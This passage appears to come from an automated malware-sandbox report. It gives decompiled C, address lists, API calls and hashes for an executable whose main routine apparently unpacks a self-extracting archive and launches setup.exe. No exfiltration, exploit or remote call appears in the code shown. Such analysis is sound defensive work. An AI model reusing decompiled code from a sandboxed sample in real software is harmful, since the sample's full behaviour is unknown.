				}
				_t29 = E00401014(_t56, GetModuleHandleA(0), 0, _v104, _t27); // executed
				_v100 = _t29;
				E00416C96(_t29);
				_v108 =  *((intOrPtr*)( *_v24));
				return E00417039(_t47, _t56,  *((intOrPtr*)( *_v24)), _v24);
			}















                              0x00414b04
                              0x00414b07
                              0x00414b09
                              0x00414b0e
                              0x00414b19
                              0x00414b1a
                              0x00414b26
                              0x00414b27
                              0x00414b2a
                              0x00414b34
                              0x00414b3c
                              0x00414b42
                              0x00414b4d
                              0x00414b56
                              0x00414b65
                              0x00414b69
                              0x00414b6e
                              0x00414b76
                              0x00414b7a
                              0x00414b7f
                              0x00414b82
                              0x00414b85
                              0x00414b90
                              0x00414b9a
                              0x00414b9f
                              0x00414ba4
                              0x00414ba9
                              0x00414bae
                              0x00414bb5
                              0x00414bc0
                              0x00414bc3
                              0x00414bc7
                              0x00414bd1
                              0x00414bc9
                              0x00414bc9
                              0x00414bc9
                              0x00414bdf
                              0x00414be4
                              0x00414be8
                              0x00414bf4
                              0x00414c00

                              APIs
                              • GetVersion.KERNEL32 ref: 00414B2A
                                • Part of subcall function 004159F8: HeapCreate.KERNELBASE(00000000,00001000,00000000,00414B62,00000001), ref: 00415A09
                                • Part of subcall function 004159F8: HeapDestroy.KERNEL32 ref: 00415A48
                              • GetCommandLineA.KERNEL32 ref: 00414B8A
                              • GetStartupInfoA.KERNEL32(?), ref: 00414BB5
                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00414BD8
                                • Part of subcall function 00414C31: ExitProcess.KERNEL32 ref: 00414C4E
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                              • String ID: 03f
                              • API String ID: 2057626494-2341510623
                              • Opcode ID: e3a55e15dfbba78f576db0669a4780403b126b59620817d16bca0fbeb85d5517
                              • Instruction ID: b13fe99396feb2249fb7197ea22bdd2eb3a8d4431b5d50e9622b99800ed9eeb5
                              • Opcode Fuzzy Hash: e3a55e15dfbba78f576db0669a4780403b126b59620817d16bca0fbeb85d5517
                              • Instruction Fuzzy Hash: 0721D2B0A44705AFD718AFB6DC46BEE7BB8EF44714F10052FF9009A291DB3C85808A9C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004055DE Relevance: 6.1, APIs: 4, Instructions: 59fileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              C-Code - Quality: 77%
                              			E004055DE(void** __ecx, void* __eflags) {
				signed int _t23;
				signed int _t25;
				void* _t36;
				void** _t51;
				void* _t53;

				E00413954(E004196AC, _t53);
				_t51 = __ecx;
				_t23 = E0040551A(__ecx);
				if(_t23 != 0) {
					if( *0x423148 == 0) {
						E00401C80(_t53 - 0x18,  *(_t53 + 8));
						 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
						_t25 = AreFileApisANSI();
						asm("sbb eax, eax");
						_push( ~_t25 + 1);
						 *_t51 = FindFirstFileA( *(E00403D04(_t53 - 0x24)), _t53 - 0x164);
						E00403A9C( *((intOrPtr*)(_t53 - 0x24)));
						 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
						E00403A9C( *((intOrPtr*)(_t53 - 0x18)));
						__eflags =  *_t51 - 0xffffffff;
						if(__eflags != 0) {
							E00405705(_t53 - 0x164,  *((intOrPtr*)(_t53 + 0xc)), __eflags);
						}
					} else {
						_t36 = FindFirstFileW( *(_t53 + 8), _t53 - 0x3b4); // executed
						_t61 = _t36 - 0xffffffff;
						 *_t51 = _t36;
						if(_t36 != 0xffffffff) {
							E004056A6(_t53 - 0x3b4,  *((intOrPtr*)(_t53 + 0xc)), _t61);
						}
					}
					_t23 = 0 |  *_t51 != 0xffffffff;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t23;
			}








                              0x004055e3
                              0x004055ef
                              0x004055f1
                              0x004055f8
                              0x00405605
                              0x00405634
                              0x00405639
                              0x0040563d
                              0x00405645
                              0x0040564e
                              0x00405667
                              0x00405669
                              0x00405671
                              0x00405675
                              0x0040567a
                              0x0040567f
                              0x0040568a
                              0x0040568a
                              0x00405607
                              0x00405611
                              0x00405617
                              0x0040561a
                              0x0040561c
                              0x00405627
                              0x00405627
                              0x0040561c
                              0x00405694
                              0x00405694
                              0x0040569b
                              0x004056a3

                              APIs
                              • __EH_prolog.LIBCMT ref: 004055E3
                                • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                              • FindFirstFileW.KERNELBASE(?,?), ref: 00405611
                              • AreFileApisANSI.KERNEL32(?), ref: 0040563D
                              • FindFirstFileA.KERNEL32(?,?,00000001), ref: 0040565E
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: FileFind$First$ApisCloseH_prolog
                              • String ID:
                              • API String ID: 4121580741-0
                              • Opcode ID: fcb5256250039c908afd196fb8e76c17c38080862ebf91937f58451f3d562862
                              • Instruction ID: 53571c6d670a3437f98eaf3b47711b77fa147e423a783867877babb07b55427d
                              • Opcode Fuzzy Hash: fcb5256250039c908afd196fb8e76c17c38080862ebf91937f58451f3d562862
                              • Instruction Fuzzy Hash: AB21813180050ADFCF11EF60C8459EEBB75EF00329F10476AE4A5B61E1DB399A85CF48
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040553A Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0040553A(void** __ecx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
				struct _WIN32_FIND_DATAA _v324;
				void* _t8;
				void** _t14;

				_t14 = __ecx;
				if(E0040551A(__ecx) == 0) {
					L2:
					return 0;
				}
				_t8 = FindFirstFileA(_a4,  &_v324); // executed
				 *_t14 = _t8;
				if(_t8 != 0xffffffff) {
					E0040557F( &_v324, _a8, __eflags);
					return 1;
				}
				goto L2;
			}






                              0x00405544
                              0x0040554d
                              0x00405566
                              0x00000000
                              0x00405566
                              0x00405559
                              0x00405562
                              0x00405564
                              0x00405573
                              0x00000000
                              0x00405578
                              0x00000000

                              APIs
                                • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                              • FindFirstFileA.KERNELBASE(?,?,000000FF), ref: 00405559
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: Find$CloseFileFirst
                              • String ID:
                              • API String ID: 2295610775-0
                              • Opcode ID: 4d5417fc6ca074e65557f02866c61fee52306747aaa4eef42dce5467d8724910
                              • Instruction ID: 4d0f5172a85985fc9641596f45f8b0e99eb03685ed3a07152804d04183bf4296
                              • Opcode Fuzzy Hash: 4d5417fc6ca074e65557f02866c61fee52306747aaa4eef42dce5467d8724910
                              • Instruction Fuzzy Hash: 5DE0923040050876CB20BF35DC019EB776AEF11398F104276F955672E5D738D9468F98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041584A Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0041584A() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00415804); // executed
				 *0x4233b0 = _t1;
				return _t1;
			}




                              0x0041584f
                              0x00415855
                              0x0041585a

                              APIs
                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00015804), ref: 0041584F
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 606abe9215baac8c82b0634bac82feb5658c8fb73c9735c67e630ff6bf3afee2
                              • Instruction ID: 76677b13eed7a87b3dd700732a0fedcf1c6828d453a24416ba8446ce1f8cc847
                              • Opcode Fuzzy Hash: 606abe9215baac8c82b0634bac82feb5658c8fb73c9735c67e630ff6bf3afee2
                              • Instruction Fuzzy Hash: 6CA022F0280300CF8B00AF20AC082C03E30F28830330000B3B80080238CF380388CA2C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041585C Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                              Download Yara Rule
                              APIs
                              • SetUnhandledExceptionFilter.KERNELBASE ref: 00415861
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 1d24ef28bc6494d4f32e17e582550bcecd4607126de7dd0e3447cde8bb60405a
                              • Instruction ID: 9f5714f3741d262582d91aa49c58cb07bd20065c27159592644951a243d3f8b5
                              • Opcode Fuzzy Hash: 1d24ef28bc6494d4f32e17e582550bcecd4607126de7dd0e3447cde8bb60405a
                              • Instruction Fuzzy Hash:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00401014 Relevance: 56.7, APIs: 12, Strings: 20, Instructions: 692windowsynchronizationCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 401014-401124 call 401a51 call 402170 * 4 GetCommandLineW call 401c80 call 4038ee call 403a9c call 402170 call 4045e2 call 40235e call 402323 call 401c80 call 401e3a call 403b4f call 403a9c * 2 35 401126-401155 call 401e19 call 401d7a call 403a9c call 40235e call 402323 0->35 36 40115a-401184 call 40243e call 401af4 0->36 35->36 45 401186-401189 36->45 46 40119f-4011cb call 401c80 call 402170 36->46 48 401197-40119a 45->48 49 40118b-401192 call 411093 45->49 62 4014b1-4014d5 call 401ecd call 405298 46->62 63 4011d1-4011f7 call 402155 call 403d5a 46->63 53 4019c4-4019f7 call 403a9c * 6 48->53 49->48 109 4019fa 53->109 78 4014f0-4014fc call 403a76 62->78 79 4014d7-4014da 62->79 80 401212-4012a1 call 401c80 call 404073 call 403a9c call 401c80 call 404073 call 403a9c call 401c80 call 404073 call 403a9c call 403b4f 63->80 81 4011f9-4011fc 63->81 99 401513 78->99 100 4014fe-401511 call 401f0d 78->100 85 4014e8-4014eb 79->85 86 4014dc-4014e3 call 411093 79->86 189 4012a3 80->189 190 4012a9-4012d1 call 401c80 call 404041 call 403a9c 80->190 82 40120a-40120d 81->82 83 4011fe-401205 call 411093 81->83 91 401333-401398 call 4042d6 call 4042ad call 403a9c * 8 82->91 83->82 94 401998-4019c1 call 401a2d call 403a9c * 3 85->94 86->85 91->109 94->53 106 401515-401517 99->106 100->106 112 401519-40151b 106->112 113 40151f-401528 call 408107 106->113 118 4019fc-401a00 109->118 112->113 125 40152a-401536 call 411093 113->125 126 40153b-401583 call 401a03 call 402170 call 402f15 113->126 140 40163e-401640 125->140 156 401585-401588 126->156 157 4015f9-401622 call 403a9c call 401ecd call 405033 SetCurrentDirectoryA 126->157 140->85 145 401646-40164c 140->145 145->85 161 4015f1-4015f4 156->161 162 40158a-40158d 156->162 196 401651-401654 157->196 197 401624-40163d SetCurrentDirectoryA call 403a9c * 2 157->197 166 4018b7-4018cb call 403a9c * 2 161->166 167 401594-4015b7 call 40602f call 401d7a call 403a9c 162->167 168 40158f-401592 162->168 200 4018d3-401935 call 401a2d call 403a9c * 9 166->200 201 4018cd-4018cf 166->201 169 4015bc-4015c1 167->169 168->167 168->169 169->161 178 4015c3-4015c6 169->178 178->161 184 4015c8-4015f0 call 40602f MessageBoxW call 403a9c 178->184 184->161 189->190 235 4012d3-4012e6 call 401d7a 190->235 236 4012eb-4012ee 190->236 202 40165a-401691 call 401a18 196->202 203 40172c-40172f 196->203 197->140 200->118 201->200 222 401693-40169a call 401de3 202->222 223 40169f-4016e4 call 401a18 ShellExecuteExA 202->223 211 401731-40176b call 401d1b call 401a18 call 40587c call 403a9c 203->211 212 401787-4017f9 call 401ce1 call 405d0b call 401c80 call 401e56 call 403a9c * 2 call 401c80 call 401e56 call 403a9c 203->212 211->212 278 40176d-401770 211->278 324 401811-401891 call 402634 call 401a18 call 403a9c CreateProcessA 212->324 325 4017fb-40180c call 401db8 call 401de3 212->325 222->223 245 4016e6-4016e9 223->245 246 40170d-401727 call 403a9c * 2 223->246 235->236 242 4012f4-4012f7 236->242 243 40139d-4014ac call 401c80 call 404073 call 401d7a call 403a9c * 2 call 401c80 call 404073 call 401d7a call 403a9c * 2 call 401c80 call 404073 call 402634 call 401d7a call 403a9c * 6 call 4042d6 call 4042ad 236->243 242->243 251 4012fd-40130f MessageBoxW 242->251 243->62 253 4016f7-401708 call 403a9c * 2 245->253 254 4016eb-4016f2 call 411093 245->254 281 40195a-40195e 246->281 251->243 259 401315-401330 call 403a9c * 3 251->259 287 4018ae 253->287 254->253 259->91 279 401776-401782 call 411093 278->279 280 4018af-4018b4 SetCurrentDirectoryA 278->280 279->280 280->166 289 401960-40196e WaitForSingleObject CloseHandle 281->289 290 401974-40197c SetCurrentDirectoryA call 403a9c 281->290 287->280 289->290 303 401981-401990 call 403a9c 290->303 303->94 317 401992-401994 303->317 317->94 342 401897-40189a 324->342 343 40193a-401955 CloseHandle call 403a9c 324->343 325->324 345 4018a3-4018a9 call 403a9c 342->345 346 40189c-40189e call 411127 342->346 343->281 345->287 346->345
                              C-Code - Quality: 90%
                              			E00401014(void* __eflags, void* _a4, signed int _a7) {
				signed int _v5;
				char _v20;
				struct HWND__* _v24;
				struct HWND__* _v28;
				char _v32;
				struct HWND__* _v36;
				signed int _v40;
				signed int _v44;
				struct HWND__* _v48;
				struct HWND__* _v52;
				char _v56;
				WCHAR* _v68;
				struct HWND__* _v72;
				struct HWND__* _v76;
				char _v80;
				struct HWND__* _v84;
				struct HWND__* _v88;
				char _v92;
				struct HWND__* _v96;
				struct HWND__* _v100;
				char _v104;
				struct HWND__* _v108;
				struct HWND__* _v112;
				char _v116;
				CHAR* _v128;
				CHAR* _v140;
				char _v144;
				struct HWND__* _v148;
				struct HWND__* _v152;
				char _v156;
				intOrPtr _v164;
				char _v176;
				char _v188;
				char _v200;
				char _v212;
				char _v216;
				CHAR* _v228;
				struct _PROCESS_INFORMATION _v244;
				struct _STARTUPINFOA _v312;
				void* __ebp;
				char _t280;
				intOrPtr* _t294;
				void* _t297;
				void* _t302;
				signed int _t306;
				signed int _t308;
				signed int _t314;
				signed int _t318;
				signed int _t339;
				void* _t375;
				signed char _t384;
				signed int _t423;
				signed int _t436;
				int _t466;
				intOrPtr _t501;
				void* _t619;
				void* _t620;
				void* _t635;
				signed int _t636;
				signed int _t640;
				signed int _t642;
				void* _t643;
				char** _t644;

				 *0x423144 = _a4;
				_t280 = E00401A51();
				_t635 = 3;
				 *0x423148 = _t280;
				_v156 = 0;
				_v152 = 0;
				_v148 = 0;
				E00402170( &_v156, _t635);
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				E00402170( &_v32, _t635);
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				E00402170( &_v80, _t635);
				_v116 = 0;
				_v112 = 0;
				_v108 = 0;
				E00402170( &_v116, _t635);
				E00401C80( &_v68, GetCommandLineW());
				_push( &_v32);
				E004038EE( &_v68,  &_v156);
				E00403A9C(_v68);
				_v104 = 0;
				_v100 = 0;
				_v96 = 0;
				E00402170( &_v104, _t635);
				_t501 =  *0x423144; // 0x400000
				E004045E2(_t501,  &_v104);
				E0040235E( &_v32);
				E00402323( &_v32);
				_a7 = 0;
				_t294 = E00401C80( &_v68, L"-y");
				E00401E3A( &_v32,  &_v20, 2);
				_t297 = E00403B4F( *_t294);
				E00403A9C(_v20);
				E00403A9C(_v68);
				_t649 = _t297;
				if(_t297 == 0) {
					_a7 = 1;
					E00401D7A( &_v32, E00401E19( &_v32,  &_v20, 2));
					E00403A9C(_v20);
					E0040235E( &_v32);
					E00402323( &_v32);
				}
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				E0040243E( &_v92, _t635);
				_push( &_v92);
				_push(";!@InstallEnd@!");
				_t302 = E00401AF4(_v104, ";!@Install@!UTF-8!", _t649); // executed
				if(_t302 != 0) {
					E00401C80( &_v212, L".\\");
					_v56 = 0;
					_v52 = 0;
					_v48 = 0;
					E00402170( &_v56, _t635);
					__eflags = _v88;
					_v216 = 1;
					if(_v88 == 0) {
						L21:
						_v144 = 0;
						E00401ECD( &_v140);
						_t306 = E00405298( &_v144, _t643,  *0x420060);
						__eflags = _t306;
						if(_t306 != 0) {
							_push(0x1c);
							_t640 = E00403A76();
							__eflags = _t640;
							if(_t640 == 0) {
								_t636 = 0;
								__eflags = 0;
							} else {
								_t139 = _t640 + 8; // 0x8
								 *((intOrPtr*)(_t640 + 4)) = 0;
								E00401F0D(_t139);
								 *_t640 = 0x41b328;
								_t636 = _t640;
							}
							__eflags = _t636;
							if(_t636 != 0) {
								 *((intOrPtr*)( *_t636 + 4))(_t636);
							}
							_t308 = E00408107(_t636);
							__eflags = _t308;
							if(_t308 == 0) {
								E00401A03();
								_v5 = 0;
								_v44 = 0;
								_v40 = 0;
								_v36 = 0;
								E00402170( &_v44, 3);
								_push( &_v44);
								_push( &_v5);
								_push(_v216);
								_push( &_v200); // executed
								_t314 = E00402F15(_t636,  &_v104, __eflags); // executed
								__eflags = _t314;
								if(_t314 == 0) {
									E00403A9C(_v44);
									E00401ECD( &_v128);
									E00405033( &_v128);
									_t318 = SetCurrentDirectoryA(_v140); // executed
									__eflags = _t318;
									if(_t318 != 0) {
										__eflags = _v76;
										if(_v76 == 0) {
											__eflags = _v52;
											if(_v52 != 0) {
												L57:
												E00401CE1( &_v68,  &_v200);
												E00405D0B( &_v68);
												E00401C80( &_v20, L"%%T\\");
												E00401E56( &_v56,  &_v20,  &_v68);
												E00403A9C(_v20);
												E00403A9C(_v68);
												E00401C80( &_v20, L"%%T");
												E00401E56( &_v56,  &_v20,  &_v200);
												E00403A9C(_v20);
												__eflags = _v28;
												if(_v28 != 0) {
													E00401DB8( &_v56, 0x20);
													E00401DE3( &_v56,  &_v32);
												}
												_push( &_v56);
												_v312.cb = 0x44;
												_v312.lpReserved = 0;
												_v312.lpDesktop.cbSize = 0;
												_v312.lpTitle = 0;
												_v312.dwFlags = 0;
												_v312.cbReserved2 = 0;
												_v312.lpReserved2 = 0;
												E00402634( &_v188,  &_v212);
												E00401A18();
												E00403A9C(_v188);
												_t339 = CreateProcessA(0, _v228, 0, 0, 0, 0, 0, 0,  &_v312,  &_v244); // executed
												__eflags = _t339;
												if(_t339 != 0) {
													CloseHandle(_v244.hThread);
													_a4 = _v244.hProcess;
													E00403A9C(_v228);
													L69:
													__eflags = _a4;
													if(_a4 != 0) {
														WaitForSingleObject(_a4, 0xffffffff);
														CloseHandle(_a4);
													}
													SetCurrentDirectoryA(_v128); // executed
													E00403A9C(_v128);
													E00403A9C(_v200);
													__eflags = _t636;
													if(_t636 != 0) {
														 *((intOrPtr*)( *_t636 + 8))(_t636);
													}
													goto L73;
												} else {
													__eflags = _a7;
													if(_a7 == 0) {
														__eflags = 0;
														E00411127(0);
													}
													E00403A9C(_v228);
													L63:
													L64:
													SetCurrentDirectoryA(_v128);
													_push(_v128);
													L65:
													E00403A9C();
													E00403A9C(_v200);
													__eflags = _t636;
													if(_t636 != 0) {
														 *((intOrPtr*)( *_t636 + 8))(_t636);
													}
													E00401A2D( &_v144);
													E00403A9C(_v140);
													E00403A9C(_v56);
													E00403A9C(_v212);
													E00403A9C(_v92);
													E00403A9C(_v104);
													E00403A9C(_v116);
													E00403A9C(_v80);
													E00403A9C(_v32);
													E00403A9C(_v156);
													_t375 = 1;
													return _t375;
												}
											}
											E00401D1B( &_v56, L"setup.exe");
											_t384 = E0040587C( *((intOrPtr*)(E00401A18())),  &_v56, __eflags);
											asm("sbb al, al");
											_v5 =  ~_t384 + 1;
											E00403A9C(_v188);
											__eflags = _v5;
											if(_v5 == 0) {
												goto L57;
											}
											__eflags = _a7;
											if(_a7 == 0) {
												E00411093(0, L"Can not find setup.exe");
											}
											goto L64;
										}
										E00401A18();
										__eflags = _v28;
										_v312.lpDesktop.cbSize = 0x3c;
										_v312.lpTitle = 0x140;
										_v312.dwX = 0;
										_v312.dwY = 0;
										_v312.dwXSize = _v68;
										if(_v28 != 0) {
											E00401DE3( &_v116,  &_v32);
										}
										E00401A18();
										_v312.dwXCountChars = 0;
										asm("sbb eax, eax");
										_v312.dwYCountChars = 1;
										_v312.hStdError = 0;
										_v312.dwYSize =  ~_v40 & _v44;
										ShellExecuteExA( &(_v312.lpDesktop));
										__eflags = _v312.dwFillAttribute - 0x20;
										if(_v312.dwFillAttribute > 0x20) {
											_a4 = _v312.hStdError;
											E00403A9C(_v44);
											E00403A9C(_v68);
											goto L69;
										} else {
											__eflags = _a7;
											if(_a7 == 0) {
												__eflags = 0;
												E00411093(0, L"Can not open file");
											}
											E00403A9C(_v44);
											E00403A9C(_v68);
											goto L63;
										}
									}
									SetCurrentDirectoryA(_v128);
									E00403A9C(_v128);
									E00403A9C(_v200);
									goto L43;
								}
								__eflags = _a7;
								if(_a7 != 0) {
									L40:
									_push(_v44);
									goto L65;
								}
								__eflags = _t314 - 1;
								if(_t314 == 1) {
									L36:
									_t619 = 8;
									E00401D7A( &_v44, E0040602F(_t619));
									E00403A9C(_v188);
									_t314 = 0x80004005;
									L37:
									__eflags = _t314 - 0x80004004;
									if(_t314 != 0x80004004) {
										__eflags = _v40;
										if(_v40 != 0) {
											_t620 = 7;
											MessageBoxW(0, _v44,  *(E0040602F(_t620)), 0x10);
											E00403A9C(_v188);
										}
									}
									goto L40;
								}
								__eflags = _v5;
								if(_v5 == 0) {
									goto L37;
								}
								goto L36;
							} else {
								E00411093(0, L"Can not load codecs");
								L43:
								__eflags = _t636;
								if(_t636 != 0) {
									 *((intOrPtr*)( *_t636 + 8))(_t636);
								}
								L24:
								_push(1);
								_pop(0);
								L73:
								E00401A2D( &_v144);
								E00403A9C(_v140);
								E00403A9C(_v56);
								E00403A9C(_v212);
								_t644 =  &(_t644[3]);
								goto L74;
							}
						}
						__eflags = _a7;
						if(_a7 == 0) {
							__eflags = 0;
							E00411093(0, L"Can not create temp folder archive");
						}
						goto L24;
					}
					E00402155( &_v176);
					_v176 = 0x41b334;
					_t423 = E00403D5A( &_v92,  &_v176);
					__eflags = _t423;
					if(_t423 != 0) {
						E00401C80( &_v20, L"Title");
						E00404073( &_v68,  &_v176,  &_v20);
						E00403A9C(_v20);
						 *_t644 = L"BeginPrompt";
						E00401C80( &_v20);
						E00404073( &_v44,  &_v176,  &_v20);
						E00403A9C(_v20);
						 *_t644 = L"Progress";
						E00401C80( &_v20);
						E00404073( &_v228,  &_v176,  &_v20);
						E00403A9C(_v20);
						_t436 = E00403B4F(L"no");
						__eflags = _t436;
						if(_t436 == 0) {
							_v216 = 0;
						}
						E00401C80( &_v20, L"Directory");
						_t642 = E00404041( &_v176,  &_v20);
						E00403A9C(_v20);
						__eflags = _t642;
						if(_t642 >= 0) {
							__eflags =  *((intOrPtr*)(_v164 + _t642 * 4)) + 0xc;
							E00401D7A( &_v212,  *((intOrPtr*)(_v164 + _t642 * 4)) + 0xc);
						}
						__eflags = _v40;
						if(_v40 == 0) {
							L20:
							E00401C80( &_v20, L"RunProgram");
							E00401D7A( &_v56, E00404073( &(_v244.hThread),  &_v176,  &_v20));
							E00403A9C(_v244.hThread);
							E00403A9C(_v20);
							E00401C80( &_v20, L"ExecuteFile");
							E00401D7A( &_v80, E00404073( &(_v244.hThread),  &_v176,  &_v20));
							E00403A9C(_v244.hThread);
							E00403A9C(_v20);
							E00401C80( &_v20, L"ExecuteParameters");
							_push( &_v32);
							E00401D7A( &_v116, E00402634( &(_v244.hThread), E00404073( &_v188,  &_v176,  &_v20)));
							E00403A9C(_v244.hThread);
							E00403A9C(_v188);
							E00403A9C(_v20);
							E00403A9C(_v228);
							E00403A9C(_v44);
							E00403A9C(_v68);
							_t644 =  &(_t644[6]);
							_v176 = 0x41b334;
							E004042D6();
							E004042AD( &_v176);
							goto L21;
						} else {
							__eflags = _a7;
							if(_a7 != 0) {
								goto L20;
							}
							_t466 = MessageBoxW(0, _v44, _v68, 0x24);
							__eflags = _t466 - 6;
							if(_t466 == 6) {
								goto L20;
							}
							E00403A9C(_v228);
							E00403A9C(_v44);
							E00403A9C(_v68);
							_t644 =  &(_t644[3]);
							L19:
							_v176 = 0x41b334;
							E004042D6();
							E004042AD( &_v176);
							E00403A9C(_v56);
							E00403A9C(_v212);
							E00403A9C(_v92);
							E00403A9C(_v104);
							E00403A9C(_v116);
							E00403A9C(_v80);
							E00403A9C(_v32);
							E00403A9C(_v156);
							goto L75;
						}
					}
					__eflags = _a7;
					if(_a7 == 0) {
						__eflags = 0;
						E00411093(0, L"Config failed");
					}
					_push(1);
					_pop(0);
					goto L19;
				} else {
					if(_a7 == 0) {
						E00411093(0, L"Can\'t load config info");
					}
					_push(1);
					_pop(0);
					L74:
					E00403A9C(_v92);
					E00403A9C(_v104);
					E00403A9C(_v116);
					E00403A9C(_v80);
					E00403A9C(_v32);
					E00403A9C(_v156);
					L75:
					return 0;
				}
			}


































































                              0x00401023
                              0x00401028
                              0x00401031
                              0x00401039
                              0x0040103e
                              0x00401044
                              0x0040104a
                              0x00401050
                              0x00401059
                              0x0040105c
                              0x0040105f
                              0x00401062
                              0x0040106b
                              0x0040106e
                              0x00401071
                              0x00401074
                              0x0040107d
                              0x00401080
                              0x00401083
                              0x00401086
                              0x00401095
                              0x004010a3
                              0x004010a7
                              0x004010af
                              0x004010b5
                              0x004010bc
                              0x004010bf
                              0x004010c2
                              0x004010c7
                              0x004010d0
                              0x004010d8
                              0x004010e0
                              0x004010ed
                              0x004010f0
                              0x00401100
                              0x00401109
                              0x00401113
                              0x0040111b
                              0x00401121
                              0x00401124
                              0x0040112f
                              0x0040113c
                              0x00401144
                              0x0040114d
                              0x00401155
